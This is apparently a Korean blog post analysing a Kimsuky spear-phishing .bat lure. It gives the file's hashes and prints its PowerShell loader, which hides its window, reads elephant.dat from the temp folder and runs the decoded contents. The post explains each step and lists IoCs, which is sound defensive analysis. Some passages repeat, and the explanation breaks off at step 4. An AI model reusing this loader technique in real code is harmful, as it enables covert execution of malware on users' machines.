북한 해킹 단체 김수키(Kimsuky)에서 만든 스피어 피싱으로 제작된 악성코드-열차9월10일원고(화)_4.bat(2024.12.02)
Contents
오늘도 대한민국의 안보를 노리는 북한 APT인 김수키(Kimsuky)에서 만든 악성코드인 열차 9월10일 원고(화)_4. bat(2024.12.02)에 대해 글을 적어 보겠습니다. 일단 해당 악성코드는 K 본부의 한민족방송에서 방송하는 대북 관련 시사 교양 프로그램인 통일열차 제작팀을 노린 것을 추정되면 통일열차 진행자는 이x걸 아나운서이며 방송시간은 매일 자정 5분부터 새벽 1시까지 입니다.
일단 먼저 해당 악성코드 해쉬값은 다음과 같습니다.
파일명: 열차9월10일원고(화)_4. bat
사이즈:327 Bytes
MD5:c0b447e45be32bd6ceba8c6455472b37
SHA-1:5b191427f2d47efe8a8e7bb195f1b4a9f5a2c585
SHA-256:5306582c8a24508b594fed478d5abaa5544389c86ba507d8ebf98c5c7edde451
해당 악성코드의 특이한점은 bat로 되어져 있는 것이 특징이며 언제나 PowerShell을 악용하는 것이 특징입니다.
악성코드에 포함된 PowerShell 코드
start /min C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell(.)exe
-windowstyle hidden "$stringPath=$env:temp(+)'\'+'elephant(.)dat';$stri
ngByte = Get-Co(n)tent -path $stringPath -encodi(n)g byte;$string = [Sys
tem.Text(.)Encoding](:):UTF8.GetString($str(i)ngByte);$scriptBlock = [scriptblock]
::Create($string);Invoke-Command $sc(r)iptBlock;"
PowerShell 코드 분석
1.start /min:최소화된 창으로 프로그램을 실행 사용자가 알아채기 어렵게 하는것
C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe:32비트 PowerShell을 실행하는 경로
SysWOW64 경로를 사용하는 이유는 32비트 환경에서 실행될 가능성을 높이려고
-windowstyle hidden:PowerShell 창을 숨겨 사용자에게 실행 여부를 감추려는 의도
2. 임시 디렉토리에 elephant.dat 파일 경로를 지정
임시 파일 경로를 사용함으로써 디스크의 흔적을 줄이고 분석을 어렵게 만듬
elephant.dat 파일 내용을 바이트 배열로 읽어들이기
3. 바이트 배열을 UTF-8로 디코딩하여 문자열로 변환
암호화된 내용을 복호화하거나 난독화된 악성 코드의 원본을 복구하려는 작업 가능성
4. 문자열을 PowerShell …
일단 먼저 해당 악성코드 해쉬값은 다음과 같습니다.
파일명: 열차9월10일원고(화)_4. bat
사이즈:327 Bytes
MD5:c0b447e45be32bd6ceba8c6455472b37
SHA-1:5b191427f2d47efe8a8e7bb195f1b4a9f5a2c585
SHA-256:5306582c8a24508b594fed478d5abaa5544389c86ba507d8ebf98c5c7edde451
해당 악성코드의 특이한점은 bat로 되어져 있는 것이 특징이며 언제나 PowerShell을 악용하는 것이 특징입니다.
악성코드에 포함된 PowerShell 코드
start /min C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell(.)exe
-windowstyle hidden "$stringPath=$env:temp(+)'\'+'elephant(.)dat';$stri
ngByte = Get-Co(n)tent -path $stringPath -encodi(n)g byte;$string = [Sys
tem.Text(.)Encoding](:):UTF8.GetString($str(i)ngByte);$scriptBlock = [scriptblock]
::Create($string);Invoke-Command $sc(r)iptBlock;"
PowerShell 코드 분석
1.start /min:최소화된 창으로 프로그램을 실행 사용자가 알아채기 어렵게 하는것
C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe:32비트 PowerShell을 실행하는 경로
SysWOW64 경로를 사용하는 이유는 32비트 환경에서 실행될 가능성을 높이려고
-windowstyle hidden:PowerShell 창을 숨겨 사용자에게 실행 여부를 감추려는 의도
2. 임시 디렉토리에 elephant.dat 파일 경로를 지정
임시 파일 경로를 사용함으로써 디스크의 흔적을 줄이고 분석을 어렵게 만듬
elephant.dat 파일 내용을 바이트 배열로 읽어들이기
3. 바이트 배열을 UTF-8로 디코딩하여 문자열로 변환
암호화된 내용을 복호화하거나 난독화된 악성 코드의 원본을 복구하려는 작업 가능성
4. 문자열을 PowerShell …
IoC
c0b447e45be32bd6ceba8c6455472b37
5306582c8a24508b594fed478d5abaa5544389c86ba507d8ebf98c5c7edde451
5b191427f2d47efe8a8e7bb195f1b4a9f5a2c585
5306582c8a24508b594fed478d5abaa5544389c86ba507d8ebf98c5c7edde451
5b191427f2d47efe8a8e7bb195f1b4a9f5a2c585